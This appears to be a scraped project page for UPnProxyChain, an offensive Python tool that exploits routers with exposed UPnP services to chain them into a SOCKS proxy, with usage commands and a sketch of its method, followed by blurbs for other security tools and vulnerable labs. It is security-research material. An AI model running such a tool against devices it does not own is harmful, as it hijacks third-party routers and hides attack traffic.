A tool to create a SOCKS proxy server out of UPnProxy vulnerable device(s).

Overview

UPnProxyChain

A tool to create a SOCKS proxy server out of UPnProxy vulnerable device(s). Writeup here.

asciicast

General information

UPnProxyChain is a tool to create a SOCKS proxy server out of UPnProxy vulnerable device(s). The proxy transparently forwards all connections through the vulnerable devices. Thus any tool supporting the SOCKS protocol can use the connection chain.

It takes a list of IP addresses to exploit as an argument. The addresses are used to create a chain through which connections will pass.

After the chain creation, its functionality is verified, and after that, a SOCKS proxy server is started.

On exit, UPnProxyChain will clean up the chain. That means it will delete all mappings it has created on the hosts to prevent them from staying there forever.

Requirements

  • Python3

Usage

  _   _ ___      ___                   ___ _         _
 | | | | _ \_ _ | _ \_ _ _____ ___  _ / __| |_  __ _(_)_ _
 | |_| |  _/ ' \|  _/ '_/ _ \ \ / || | (__| ' \/ _` | | ' \
  \___/|_| |_||_|_| |_| \___/_\_\_, |\___|_||_\__,_|_|_||_|
                                 |__/

  Author: Valtteri Lehtinen <[email protected]>
  Writeup: https://shufflingbytes.com/posts/upnproxychain-a-tool-to-exploit-devices-vulnerable-to-upnproxy/


usage: upnproxychain.py [-h] [-p PORT] [-l LISTENADDRESS] [-c] [-v] host [host ...]

A SOCKS proxy server that forwards traffic through a chain of exposed WANIP- or WANPPPConnection UPnP services

positional arguments:
  host                  hosts to use as proxy chain links in order

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  port for SOCKS proxy to listen on
  -l LISTENADDRESS, --listenaddress LISTENADDRESS
                        address for SOCKS proxy to listen on
  -c, --check           only check for UPnProxy vulnerability
  -v, --verbose         increase output verbosity

Proxying through single host

# start proxy
./upnproxychain.py <IP>

# use the proxy to curl example.com
curl socks5h://localhost:1080 http://example.com

Proxying through multiple hosts

# start proxy
./upnproxychain.py <IP1> <IP2> <IP3> <IP4> <IP5>

# use the proxy to curl example.com
curl socks5h://localhost:1080 http://example.com

Check host for vulnerability

./upnproxychain.py -v -c <IP>

How it works

The tool will send an SSDP discover message to the target host to discover its UPnP services. Target host with flawed UPnP implementation will respond with a URI pointing to a document describing its services.

The tool will then download the document, figure if the target is offering either WANPPPConnection or WANIPConnection service, and if so, start controlling the service to inject routes.

A device may not respond to UDP discover message even though it is exploitable. For those cases, UPnProxyChain will try to guess popular UPnP ports and URIs of service description documents and go from there.

Some devices are vulnerable but are not exploitable because they have a firewall blocking usage of any additional ports.

Limitations

  • SOCKS proxy supports only CONNECT command
You might also like...

A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple challenges.

A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple challenges.

Deliberately vulnerable CI/CD environment. Hack CI/CD pipelines, capture the flags. 🚩 Created by Cider Security. Table of Contents Description Downlo

Sep 24, 2022

Now you can scan your google map api to see its vulnerable or not specially made for bug bounty hunters!🔴🔴🔴🔴✔

Now you can scan your google map api to see its vulnerable or not specially made for bug bounty hunters!🔴🔴🔴🔴✔

Google_map_api_scanner -FASTEST GOOGLE MAP API SCANNER 🔴 🔴 🔴 🔴 ✔ Google Maps API Scanner Used for determining whether a leaked/found Google Maps A

Jul 8, 2022

Capture the Flag (CTF) in computer security is an exercise in which flags are secretly hidden in purposefully-vulnerable programs or websites

Capture the Flag (CTF) in computer security is an exercise in which flags are secretly hidden in purposefully-vulnerable programs or websites. Competitors steal flags either from other competitors (attack/defense-style CTFs) or from the organizers (jeopardy-style challenges)

Aug 24, 2022

ParamFirstCheck identifies in a list of urls those containing a parameter of the top 25 of the most vulnerable parameters for SQLi, LFI, RCE and Open redirect

ParamFirstCheck identifies in a list of urls those containing a parameter of the top 25 of the most vulnerable parameters for SQLi, LFI, RCE and Open redirect

ParamFirstCheck ParamFirstCheck identifies in a list of urls those containing the top 25 of the most vulnerable parameters to SQLi, LFI, RCE and Open

Sep 22, 2022

AzureGoat : A Damn Vulnerable Azure Infrastructure

AzureGoat : A Damn Vulnerable Azure Infrastructure

AzureGoat : A Damn Vulnerable Azure Infrastructure Compromising an organization's cloud infrastructure is like sitting on a gold mine for attackers. A

Sep 22, 2022

Erlik - Vulnerable Soap Service

Erlik - Vulnerable Soap Service

Vulnerable-Soap-Service Erlik - Vulnerable Soap Service Tested - Kali 2022.1 Description It is a vulnerable SOAP web service. It is a lab environment

Sep 24, 2022

ioquake3 engine is vulnerable to a remotely exploitable off-by-one overflow due to a miscalculated array index within the privileged admin console command banaddr

ioquake3 engine is vulnerable to a remotely exploitable off-by-one overflow due to a miscalculated array index within the privileged admin console command banaddr. Attacker needs the rcon password to exploit this vulnerability.

Sep 6, 2022

Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.

CVE-2022-20128 Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons

Sep 20, 2022

Erlik 2 - Vulnerable-Flask-App

Erlik 2 - Vulnerable-Flask-App

Vulnerable-Flask-App Erlik 2 - Vulnerable-Flask-App Tested - Kali 2022.1 Description It is a vulnerable Flask Web App. It is a lab environment created

Sep 21, 2022
Owner
Valtteri Lehtinen
Look on my works, ye Mighty, and despair!
Valtteri Lehtinen
Proxy Eagle is an advanced proxy checker powered with parallelism. Using Sockets.

ProxyEagle Proxy Eagle is an advanced proxy checker powered with parallelism. Using Sockets. Build with standard python libraries. The only requiremen

Pix4Devs 9 Sep 21, 2022
A repository with codes used on Mini4, a UWB device. It can be use as device calibration, get distance between anchors and tags, also localization.

uwb_device A repository with codes used on Mini4, a UWB device. It can be use as device calibration, get distance between anchors and tags, also local

Ethan Chiu 1 Apr 12, 2022
DSM-tui (Decks Server Manager TUI) is a tool that allows server management by viewing active services and server status. It is developed in python with TUI (Terminal User Inteface) interface

DSM-TUI Documentation Description DSM-TUI (Decks Server Manager TUI) is a tool that allows server management by viewing active services and server sta

Aniko 3 Aug 10, 2022
I built a function to crop out the images detected when using Tensorflow 2.0. This Just crops out each detected image and stores them in file path under the images Name.

Tensorflow_crop_import I built a function to crop out the images detected when using Tensorflow 2.0. This Just crops out each detected image and store

null 0 Sep 21, 2022
A multi-client, multi-server proxy implemented in Python

Gamma A Minecraft proxy implemented in Python Gamma is a reverse-TCP proxy for Minecraft networks implemented in Python using the Socket package. Gamm

Mitch 9 Aug 9, 2022
SOCKS5/SOCKS4/HTTP proxy server

tiny-proxy Simple proxy (SOCKS4(a), SOCKS5(h), HTTP tunnel) server built with anyio. It is used for testing python-socks, aiohttp-socks and httpx-sock

Roman Snegirev 2 Jul 25, 2022
A proxy server to bypass cloudflare I am under attack mode using playwright, written in python

Cloudfire Cloudfire is a reverse proxy to bypass cloudflare's javascript challenge (I'm under attack mode) using playwright. How it works Cloudfire us

midnightFirefly 1 Aug 29, 2022
Coordinator server for client-server-server-client test cases

Traffic Light Trafficlight controller for multiple clients (client-server-server-client) under test. Shape of server still under development. Concept

matrix.org 4 Sep 9, 2022
Fork of katznboyz1/youtube-dl-server. More features including accessing downloaded media from any device.

youtube-dl-server (A fork of katznboyz1/youtube-dl-server which is based on manbearwiz/youtube-dl-server. This project is still in the beta stages, so

Allen 2 Sep 10, 2022
Collect XSS vulnerable parameters from entire domain.

collector Collect XSS vulnerable parameters from entire domain. _ _ _ | | | | | _

Md. Nur habib 79 Sep 30, 2022